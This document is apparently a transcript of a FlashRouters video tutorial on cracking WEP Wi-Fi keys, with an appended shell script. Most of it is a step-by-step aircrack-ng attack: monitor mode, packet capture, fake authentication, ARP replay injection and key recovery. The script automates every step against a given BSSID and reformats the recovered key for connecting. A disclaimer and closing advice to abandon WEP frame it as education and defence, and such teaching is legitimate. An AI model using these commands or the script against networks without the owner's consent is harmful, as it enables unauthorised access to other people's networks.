Hi, this instructional video will teach you the steps required to crack WEP Wi-Fi passwords on most routers. Before we get started, a disclaimer: this guide is for educational purposes only. You should only attempt to crack passwords on a device you own, or with the express consent of the owner. Failing to do so can constitute a crime in many countries. FlashRouters is not responsible or liable for any misuse of the information contained in this guide.

To follow this guide you'll require three things. First, a Wi-Fi enabled router configured to use WEP security. I'll be using an ASUS RT-N66U router running Tomato firmware, but this will work with just about any router using any firmware, because the weakness is in the WEP protocol itself, not in any one vendor's implementation of it. Second, a Wi-Fi card with Linux driver support and packet injection. You can look online for a list of supported devices; most likely your built-in card does not support this capability. I'm using the TP-Link TL-WN722N Wi-Fi USB adapter. It's small, portable, and cheap. I recommend the High Gain model as this will give you greater range. Finally, you will need a Linux operating system with the aircrack-ng suite installed; airmon-ng, airodump-ng, aireplay-ng and aircrack-ng, which the rest of this guide uses, are all part of it. The operating system can be installed as your primary OS, in a multi-boot configuration, or inside a virtual machine. You can even use a live-boot image and run it directly off a USB thumb drive. If you go the virtual machine route, pass the USB adapter through to the guest: the VM's virtual network card cannot be put into monitor mode. This guide assumes you are using Debian or a Debian-based distro such as Ubuntu. Any distro should work but the exact command-line syntax may vary slightly. I'll be using the 64-bit version of Debian 7.2 running inside VMware Player.
start the cracking procedure. First we need to place our Wi-Fi adapter into monitoring
mode. Do this by running: airmon-ng start wlan0
Before we can go further we’ll need to record some information. First we need our host mac
address. Run ifconfig and note the mac address for wlan0.
Next we need some information about our target router. Run: airodump-ng –encrypt WEP mon0
for a few seconds. It will record all WEP secured routers within range. My router is
called cracktest. When you see your router you can press control+c to kill the command.
Write down the BSSID, Channel, and ESSID for your router.
Now we need to capture and record some data. Run: airodump-ng -c 8 –bssid AC:22:0B:D3:7A:88
-w output mon0. Let this run in the background while we open up some other command prompts.
Next we need to fake authentication with our router. To do this run the following command:
aireplay-ng -1 0 -e cracktest -a AC:22:0B:D3:7A:88 -h 56:20:bb:21:72:fd mon0
where -1 0 selects fake authentication with no reassociation delay, the -e parameter is the name of your router, the -a parameter is your router's BSSID, and the -h parameter is the host MAC address. This step matters because an access point drops data frames from a station it has not authenticated and associated, so without it the replay in the next step would produce nothing. You'll notice when I ran this command I got an error telling me that I need to add this switch --ignore-negative-one. This is due to a bug in my kernel drivers. You can either patch it or just add the switch at the end. If it succeeds you should get a successful notification at the bottom.
Now we can start listening for ARP requests and re-injecting them. Do this by running: aireplay-ng -3 -b AC:22:0B:D3:7A:88 -h 56:20:bb:21:72:fd --ignore-negative-one mon0
(leave out --ignore-negative-one if your driver did not need it in the previous step). Let this run for a while. What we're looking for is a rapid increase in the number of ARP requests. Sometimes it takes a few seconds until they start to show, so be patient. The reason this works is that WEP has no replay protection: each time the captured ARP request is re-sent, the router relays it as a freshly encrypted frame with a new IV, and those IVs are exactly the data aircrack-ng needs. In some cases after a while you may not see any ARP requests being generated, usually because no client on the network has sent one for us to capture. There are advanced techniques to generate the data without waiting, such as ChopChop and Fragmentation, but we won't be covering them here. Continue to let this command run and open up another terminal. Now we're ready for the last step. Run:
aircrack-ng -b AC:22:0B:D3:7A:88 output*.cap
If you captured enough data this should run very quickly. Otherwise aircrack-ng reports that it failed and keeps re-reading the growing capture, retrying as more IVs arrive, so leave the replay running and wait. When it's finished you'll see that we successfully found our WEP key. This can be used now to connect to the router; we just need to remove the colons, because aircrack-ng prints the key as hex bytes separated by colons while the router expects the bare hex string. How can you protect yourself from an attack
this simple? Well, first of all you should never use WEP under any circumstances: the attack above involves no password guessing, only enough captured traffic, so a long or random WEP key does not help. WPA & WPA2 security should be used instead. There are some flaws in the way that many vendors implement WPA which can make it equally as dangerous, so switching to WPA2 with a strong passphrase is only half the job. An open source firmware such as DD-WRT or Tomato, which comes installed on all FlashRouters, is a simple and effective way to mitigate all known WEP and WPA attacks.
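To tie the steps of the cracking procedure above together (scan for WEP networks, capture, fake authentication, ARP replay, crack, and the final colon-stripping of the key), here is an added wrapper script. It is example code written for this page, not a FlashRouters script, and it assumes the aircrack-ng tools are on the PATH, that you run it as root, and that the monitor interface is named mon0 (set MON_IFACE=wlan0mon for newer airmon-ng). The CSV excerpt inside it is constructed to look like the output-01.csv that airodump-ng -w writes, using the BSSID, channel and ESSID from the video; the names parse_wep_targets, wep_key_to_hex, run_attack and the environment variables are mine.

```shell
#!/bin/sh
# Added example for this guide (not FlashRouters' own script). Wraps the
# aircrack-ng steps shown above. Assumes: aircrack-ng suite installed, a
# card that supports injection, root, and a monitor interface named mon0
# (set MON_IFACE=wlan0mon for newer airmon-ng). Function names are mine.

# Constructed sample of the output-01.csv that airodump-ng -w writes: the
# first block lists access points, the second (after "Station MAC") lists
# clients. Values match the video's target. Not a real capture.
SAMPLE_CSV='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AC:22:0B:D3:7A:88, 2013-12-01 10:00:01, 2013-12-01 10:00:40,  8,  54, WEP , WEP, OPN, -41,      120,     3502,   0.  0.  0.  0,   9, cracktest, 
00:11:22:33:44:55, 2013-12-01 10:00:02, 2013-12-01 10:00:40,  6,  54, WPA2, CCMP, PSK, -70,       88,        0,   0.  0.  0.  0,   8, homewifi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
56:20:BB:21:72:FD, 2013-12-01 10:00:05, 2013-12-01 10:00:40, -30,      500, AC:22:0B:D3:7A:88, cracktest'

# The "write down BSSID, channel, ESSID" step, automated: read an airodump-ng
# CSV on stdin and print "BSSID channel ESSID" for every WEP network
# (Privacy is column 6, ESSID column 14).
parse_wep_targets() {
    awk -F',' '
        /^Station MAC/ { exit }          # client table follows; nothing more to do
        /^BSSID/ || NF < 14 { next }     # header line or blank separator
        {
            for (i = 1; i <= NF; i++) gsub(/^ +| +$/, "", $i)   # trim padding
            if ($6 == "WEP") print $1, $4, $14
        }'
}

# The last step: aircrack-ng prints "KEY FOUND! [ AB:CD:... ]" and the router
# wants the bare hex. A WEP key is 10 hex digits (40-bit) or 26 (104-bit);
# anything else means the key was copied wrongly, so refuse it.
wep_key_to_hex() {
    hex=$(printf '%s' "$1" | tr -d ':' | tr 'a-f' 'A-F')
    case "$hex" in
        *[!0-9A-F]*) echo "not a hex key: $1" >&2; return 1 ;;
    esac
    case "$hex" in
        ??????????|??????????????????????????) printf '%s\n' "$hex" ;;
        *) echo "bad key length (${#hex} hex digits): $1" >&2; return 1 ;;
    esac
}

# Monitor mode, capture, fake auth, ARP replay and crack in one terminal.
# Usage: WEP_LAB_RUN=1 sh wep_lab.sh wlan0 AC:22:0B:D3:7A:88 8 cracktest
# Set AIREPLAY_EXTRA=--ignore-negative-one if aireplay-ng asks for it.
run_attack() {
    iface=$1; bssid=$2; chan=$3; essid=$4
    mon=${MON_IFACE:-mon0}
    prefix=${CAPTURE_PREFIX:-output}
    extra=${AIREPLAY_EXTRA:-}

    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; return 1; }
    airmon-ng start "$iface" >/dev/null
    hostmac=$(cat "/sys/class/net/$mon/address")   # what ifconfig shows as HWaddr

    # Capture IVs on the target channel in the background; the capture files
    # are output-01.cap, output-02.cap, ... and aircrack-ng reads them all.
    airodump-ng -c "$chan" --bssid "$bssid" -w "$prefix" "$mon" >/dev/null 2>&1 &
    dump=$!
    trap 'kill $dump $replay 2>/dev/null' EXIT INT TERM
    sleep 3   # let the capture start before we inject

    # Fake authentication must succeed or the AP ignores the replayed frames.
    aireplay-ng -1 0 -e "$essid" -a "$bssid" -h "$hostmac" $extra "$mon" || return 1

    # ARP request replay: each replay makes the AP emit a frame with a new IV.
    aireplay-ng -3 -b "$bssid" -h "$hostmac" $extra "$mon" >/dev/null 2>&1 &
    replay=$!

    # aircrack-ng keeps re-reading the growing capture until it has enough IVs.
    aircrack-ng -b "$bssid" "$prefix"*.cap
}

if [ "${WEP_LAB_RUN:-0}" = "1" ]; then
    run_attack "$@"
else
    # Offline demo on the constructed CSV and a made-up key (no radio needed).
    printf '%s\n' "$SAMPLE_CSV" | parse_wep_targets
    wep_key_to_hex 'AB:CD:EF:01:23'
fi
```

Run it without WEP_LAB_RUN to exercise the parser and the key check offline; the real attack path only starts when WEP_LAB_RUN=1 is set and the interface, BSSID, channel and ESSID are given as arguments, and the trap at the end kills the background airodump-ng and aireplay-ng processes when aircrack-ng finishes or you press Control+C.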